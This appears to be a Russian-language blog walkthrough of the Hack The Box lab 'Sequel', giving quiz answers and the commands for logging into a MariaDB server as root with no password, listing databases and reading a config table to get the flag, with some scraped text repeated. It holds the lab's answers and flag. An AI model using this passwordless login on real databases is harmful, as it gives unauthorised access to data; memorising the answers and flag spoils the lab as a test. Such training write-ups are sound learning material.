163 подписчика

Hack The Box. Starting Point. Tier 1. Sequel. MariaDB.

1 декабря 20221 дек 2022

~1 мин

Рейтинг сложности: "Очень легко"

"Sequel" является частью лаборатории "Starting Point. Tier 1." Задачи Task №1 Вопрос: Что означает аббревиатура SQL?

Ответ: Structured Query Language Task №2 Вопрос: Во время сканирования цели, на каком порту работает mysql?

Ответ: 3306 Task №3 Вопрос: Какая версия MySQL, разработанная сообществом, работает на таргете?

Ответ: Сканируем "Nmap" с флагом -sC. Версия: MariaDB Task №4 Вопрос: Какой переключатель нам нужно использовать, чтобы указать имя пользователя для входа в службу MySQL?

Ответ: -u Task №5 Вопрос: Какое имя пользователя позволяет нам войти в MariaDB без ввода пароля?

Ответ: root Task №6 Вопрос: Какой символ мы можем использовать, чтобы указать в запросе, что мы хотим отобразить все данные таблицы?

Ответ: * Поиск флага Подключаемся к цели с помощью MySQL Client. mysql -h target -u root Узнаем все базы данных. show databases; Выбираем htb. use htb; Находим все таблицы в БД. show table

Рейтинг сложности: "Очень легко"

"Sequel" является частью лаборатории "Starting Point. Tier 1." Задачи Task №1 Вопрос: Что означает аббревиатура SQL?

Ответ: Structured Query Language Task №2 Вопрос: Во время сканирования цели, на каком порту работает mysql?

Ответ: 3306 Task №3 Вопрос: Какая версия MySQL, разработанная сообществом, работает на таргете?

Ответ: -u Task №5 Вопрос: Какое имя пользователя позволяет нам войти в MariaDB без ввода пароля?

Оглавление

Задачи
Task №1
Task №2

Рейтинг сложности: "Очень легко"
"Sequel" является частью лаборатории "Starting Point. Tier 1."

Задачи

Task №1

Вопрос: Что означает аббревиатура SQL?
Ответ: Structured Query Language

Task №2

Вопрос: Во время сканирования цели, на каком порту работает mysql?
Ответ: 3306

Task №3

Вопрос: Какая версия MySQL, разработанная сообществом, работает на таргете?
Ответ: Сканируем "Nmap" с флагом -sC.

Версия: MariaDB

Task №4

Вопрос: Какой переключатель нам нужно использовать, чтобы указать имя пользователя для входа в службу MySQL?
Ответ: -u

Task №5

Вопрос: Какое имя пользователя позволяет нам войти в MariaDB без ввода пароля?
Ответ: root

Task №6

Вопрос: Какой символ мы можем использовать, чтобы указать в запросе, что мы хотим отобразить все данные таблицы?
Ответ: *

Поиск флага

Подключаемся к цели с помощью MySQL Client.

mysql -h target -u root

Узнаем все базы данных.

show databases;

Выбираем htb.

use htb;

Находим все таблицы в БД.

show tables;

Теперь через SQL запрос проверяем данные в таблице config;

select * from config;

В данных таблицы флаг найден.

7b4bec00d1a39e3dd4e021ec3d915da8